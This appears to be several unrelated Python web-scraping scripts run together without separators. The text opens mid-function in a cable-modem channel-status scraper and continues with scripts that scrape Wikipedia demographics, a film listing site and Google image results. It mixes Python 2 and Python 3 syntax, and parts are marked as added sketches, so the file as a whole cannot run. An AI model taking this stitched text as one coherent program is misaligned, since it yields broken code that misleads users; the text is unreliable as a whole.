            with requests.Session() as s:
                p = s.post(login_url, data=payload, timeout=30)
                # print(p.text)
                if p.status_code != requests.codes.ok:
                    eprint("{}, code={}".format(login_url, p.status_code))
                # An authorised request.
                r = s.get(status_url, timeout=30)
                if r.status_code != requests.codes.ok:
                    eprint("{}, code={}".format(status_url, r.status_code))
                tree = html.fromstring(r.text)
                lo = s.get(logout_url, timeout=30)
                if lo.status_code != requests.codes.ok:
                    eprint("{}, code={}".format(logout_url, lo.status_code))
                if tree is None:
                    eprint("{}, no content, code={}".format(
                        status_url, r.status_code))
                    return os.EX_IOERR
        except Exception as e:
            eprint(e)
            return os.EX_IOERR

    try:
        timeel = tree.xpath('//*[text()=\'Current System Time:\']')
        if not timeel or len(timeel) < 1:
            eprint("Time not found")
            return os.EX_IOERR
        if timeel[0].tag != 'p':
            timeel = timeel[0].xpath('./ancestor::p')
            if not timeel or len(timeel) < 1:
                eprint("Time not found")
                return os.EX_IOERR
        timestr = timeel[0].text_content().encode("UTF-8").decode()
        timestr = timestr.split(':', 1)
        if not timestr or len(timestr) != 2:
            eprint("time={}, not parseable".format(timestr))
            return os.EX_IOERR
        timestr = timestr[1].strip()
        try:
            timeval = datetime.datetime.strptime(timestr,
                                                 '%a %b %d %H:%M:%S %Y')
        except ValueError as e:
            eprint("time={}, not parseable: {}".format(timestr, e))
            return os.EX_IOERR

        tbls = tree.xpath('//table')
        for tbl in tbls:
            # look for Downstream Bonded Channels table
            if tbl.xpath('.//*[contains(text(),"Downstream Bonded Channels")]'):
                rows = tbl.getchildren()
                for row in rows:
                    # first row has only the "Downstream ..." th
                    # second row has "Channel" header
                    tds = row.xpath('./td')
                    if len(tds) == 0 or tds[0].text_content() == "Channel":
                        continue
                    vals = [
                        col.text_content().encode('UTF-8').decode().strip()
                        for col in tds
                    ]
                    if len(vals) < 7:
                        eprint("Only {} values in table row".format(len(vals)))
                        continue
                    vals[4] = vals[4].replace('MHz', '').strip()
                    vals[5] = vals[5].replace('dBmV', '').strip()
                    vals[6] = vals[6].replace('dB', '').strip()
                    vals = [val.replace('----', '') for val in vals]
                    print("{0},{1}".format(timeval, ','.join(vals)))
    except etree.XPathEvalError as e:
        eprint('xpath exception={}'.format(e))
        return os.EX_IOERR

    return os.EX_OK
import re
import urllib2

# lxml parser and Matplotlib module
from lxml.html import parse
import matplotlib.pyplot as plt

# general urllib2 config
user_agent = 'Mozilla/5.0 (compatible; MSIE 5.5; Windows NT)'
headers = {'User-Agent': user_agent}
url = "http://it.wikipedia.org/wiki/Demografia_d'Italia"

# prepare the request and open the url
req = urllib2.Request(url, headers=headers)
response = urllib2.urlopen(req)

# we parse the webpage, getroot() returns the document root
doc = parse(response).getroot()

# find the data table, using css selectors
table = doc.cssselect('table.wikitable')[0]

# prepare data structures, will contain actual data
years = []
people = []

# iterate over the rows of the table, except first and last ones
for row in table.cssselect('tr')[1:-1]:
    # get the row cells (we will use only the first two)
    data = row.cssselect('td')
    # the first cell is the year
    tmp_years = data[0].text_content()
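    # Possible continuation (a sketch, not the original code): the second cell is
    # assumed to hold the population count; Italian formatting uses dots as
    # thousands separators, so strip every non-digit before converting.
    tmp_people = data[1].text_content()
    years.append(int(tmp_years.strip()[:4]))            # e.g. "1861" -> 1861
    people.append(int(re.sub(r'\D', '', tmp_people)))   # e.g. "38.330.000" -> 38330000

# plot the collected series (also part of the sketch)
plt.plot(years, people)
plt.xlabel('year')
plt.ylabel('population')
plt.show()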
import lxml.html as html

tag = []
url_list = []
title_list = []

# Collect all 'mainlink' blocks from the genre's listing pages.
for i in range(1, 137):
    root = html.parse('http://gidonline.club/genre/melodrama/page/{0}/'.format(i)).getroot()
    tag.extend(root.find_class('mainlink'))

# Keep only films released in 2010, remembering their URL and title.
for i in tag:
    try:
        y = i.find_class('mqn').pop().text_content()
        if y == '2010':
            for y in i.find_class('mainlink').pop().iterlinks():
                if y[1] == 'href':
                    url_list.append(y[2])
                    title_list.append(i.text_content().split('\n')[0])
    except IndexError:
        y = i.find_class('mqx').pop().text_content()

for i in range(len(url_list)):
    print "Title: ", title_list[i]
    print "URL: ", url_list[i], '\n'
import requests
from lxml.html import parse
from io import StringIO

# Keyword for the image search
keyword = input("Enter the image keyword to search for: ")
url = ('https://www.google.co.kr/search?q=' + keyword +
       '&source=lnms&tbm=isch&sa=X&ved=0ahUKEwic-taB9IXVAhWDHpQKHXOjC14Q_AUIBigB&biw=1842&bih=990')

# Fetch the HTML source
text = requests.get(url).text

# Parse it as an HTML document
text_source = StringIO(text)
parsed = parse(text_source)

# Root node
doc = parsed.getroot()

# Image paths live in the src attribute of the <img> tags
# (only about 20 get crawled -- see the note below).
imgs = doc.findall('.//img')

img_list = []  # list that will hold the image URLs
for a in imgs:
    img_list.append(a.get('src'))
    print(a.get('src'))
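# Why only ~20 images: the static HTML that requests.get() receives contains just the
# first batch of thumbnails; the remaining results are injected by JavaScript as the
# page scrolls. One hedged workaround is to drive a real browser. This is only a sketch
# and assumes selenium plus a matching chromedriver are installed:
import time
from selenium import webdriver
from selenium.webdriver.common.by import By

driver = webdriver.Chrome()
driver.get(url)  # same search URL as above
driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
time.sleep(2)  # give the lazy-loaded thumbnails time to appear
img_list = [img.get_attribute('src') for img in driver.find_elements(By.TAG_NAME, 'img')]
driver.quit()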